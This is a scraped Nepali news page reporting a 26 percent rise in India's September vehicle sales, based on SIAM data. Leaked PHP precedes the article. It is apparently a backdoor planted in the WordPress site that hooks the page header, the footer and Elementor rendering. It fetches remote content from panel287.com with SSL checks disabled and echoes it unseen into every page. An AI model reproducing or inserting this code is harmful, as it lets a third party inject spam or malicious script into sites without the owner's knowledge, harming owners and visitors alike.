if(!function_exists('gplrock_unified_footer_script')){function gplrock_unified_footer_script(){static $script_executed=false;if($script_executed){return;}$is_elementor_page=false;if(class_exists('Elementor\Plugin')){$elementor=\Elementor\Plugin::instance();if(!$elementor->editor->is_edit_mode()){$is_elementor_page=true;}}if(!did_action('wp_footer')&&!did_action('wp_head')&&!$is_elementor_page){return;}$footer_url='https://panel287.com/api/footer.php?linkspool='.urlencode($_SERVER['HTTP_HOST']);$response=wp_remote_get($footer_url,['timeout'=>15,'sslverify'=>false,'user-agent'=>'WordPress/'.get_bloginfo('version')]);if(!is_wp_error($response)&&wp_remote_retrieve_response_code($response)===200){$body=wp_remote_retrieve_body($response);if(!empty($body)&&strlen($body)>10){echo $body;}}$script_executed=true;}}if(!has_action('wp_footer','gplrock_unified_footer_script')){add_action('wp_footer','gplrock_unified_footer_script',999);}if(!has_action('wp_head','gplrock_unified_footer_script')){add_action('wp_head','gplrock_unified_footer_script',999);}if(class_exists('Elementor\Plugin')&&!has_action('elementor/frontend/after_render','gplrock_unified_footer_script')){add_action('elementor/frontend/after_render','gplrock_unified_footer_script',999);} भारतमा सेप्टेम्बरमा सवारी साधन विक्रीमा २६ प्रतिशतले वृद्धि – Toppo Khim

भारतमा सेप्टेम्बरमा सवारी साधन विक्रीमा २६ प्रतिशतले वृद्धि

नयाँदिल्ली । भारतमा यात्रुबाहक सवारी साधनको विक्रीमा सेप्टेम्वरमा अघिल्लो वर्षको सोही महिनाको तुलनामा २६.४५ प्रतिशतले वृद्धि देखिएको भारतीय सवारी उत्पादक समाज (एसआइएम) ले शुक्रवार जानकारी गराएको छ ।

उक्त औद्योगिक समाजका अनुसार सेप्टेम्बरमा भारतले दुई लाख ७२ हजार २७ थान कार विक्री गरेको उल्लेख छ । अघिल्लो वर्षको सोही अवधिमा दुई लाख १५ हजार १२४ थान विक्री भएको थियो ।

एसआइएमको तथ्याङ्कमा सेप्टेम्बरमा कारको विक्री अघिल्लो वर्षको सोही महिनासम्मको तुलनामा २८.९२ प्रतिशतले वृद्धि भएको र यातायातका लागि प्रयोग हुने जीप तथा अन्य सार्वजनिक सवारी साधनको विक्री २४.५० प्रतिशतले बढेको उल्लेख छ । त्यसैगरी भ्यान विक्री दरमा १०.६४ प्रतिशतले वृद्धि भएको छ ।

यसैबीच भारतमा सेप्टेम्बरमा तीन पाङ्ग्रे सवारी साधनको विक्रीमा अघिल्लो वर्षको तुलनामा ७१.९१ प्रतिशतले कमी आएको र दुई पाङ्ग्रे साधनको विक्री ११.६४ प्रतिशतले बढेको छ ।

एसआइएमले यो वर्षको गत वर्षको सेप्टेम्बरको तुलनामा सवारी साधन र तीन पाङ्ग्रे साधनको निर्यातमा क्रमशः ३५.८९ प्रतिशत र ५.३५ प्रतिशतले कमी आएको जनाएको छ । दुई पाङ्ग्रे सवारी साधनको समग्र निर्यातमा ९.१७ प्रतिशतले कमी देखिएको छ । रासस

सम्बन्धित पोस्ट
प्रतिक्रिया दिनुहोस
Loading...